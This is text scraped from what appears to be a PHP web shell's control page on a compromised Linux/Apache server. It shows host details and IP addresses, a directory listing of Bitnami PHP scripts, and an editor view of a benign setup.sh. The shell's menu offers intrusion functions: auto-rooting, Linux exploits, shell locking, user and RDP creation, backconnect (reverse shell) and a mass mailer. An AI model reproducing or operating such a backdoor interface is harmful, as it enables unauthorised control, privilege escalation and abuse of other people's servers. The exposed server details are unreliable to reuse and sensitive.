Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
scripts /
php /
[ HOME SHELL ]
Name
Size
Permission
Action
files
[ DIR ]
drwxr-xr-x
postunpack.sh
4.73
KB
-rwxr-xr-x
reload.sh
804
B
-rwxr-xr-x
resize.sh
495
B
-rwxr-xr-x
restart.sh
426
B
-rwxr-xr-x
run.sh
578
B
-rwxr-xr-x
setup.sh
1.06
KB
-rwxr-xr-x
start.sh
750
B
-rwxr-xr-x
status.sh
500
B
-rwxr-xr-x
stop.sh
726
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup.sh
#!/bin/bash # Copyright Broadcom, Inc. All Rights Reserved. # SPDX-License-Identifier: APACHE-2.0 # shellcheck disable=SC1091 set -o errexit set -o nounset set -o pipefail # set -o xtrace # Uncomment this line for debugging purposes # Load libraries . /opt/bitnami/scripts/libphp.sh . /opt/bitnami/scripts/libfs.sh . /opt/bitnami/scripts/libos.sh # Load PHP-FPM environment variables . /opt/bitnami/scripts/php-env.sh # Ensure PHP-FPM daemon user exists and required folder belongs to this user when running as 'root' if am_i_root; then ensure_user_exists "$PHP_FPM_DAEMON_USER" --group "$PHP_FPM_DAEMON_GROUP" ensure_dir_exists "$PHP_TMP_DIR" chown -R "${PHP_FPM_DAEMON_USER}:${PHP_FPM_DAEMON_GROUP}" "$PHP_TMP_DIR" # Enable daemon configuration if [[ ! -f "${PHP_CONF_DIR}/common.conf" ]]; then cp "${PHP_CONF_DIR}/common.conf.disabled" "${PHP_CONF_DIR}/common.conf" fi fi php_initialize # Start PHP-FPM service if [[ "$BITNAMI_SERVICE_MANAGER" = "systemd" ]]; then info "Starting PHP-FPM service" systemctl start bitnami.php-fpm.service fi
Close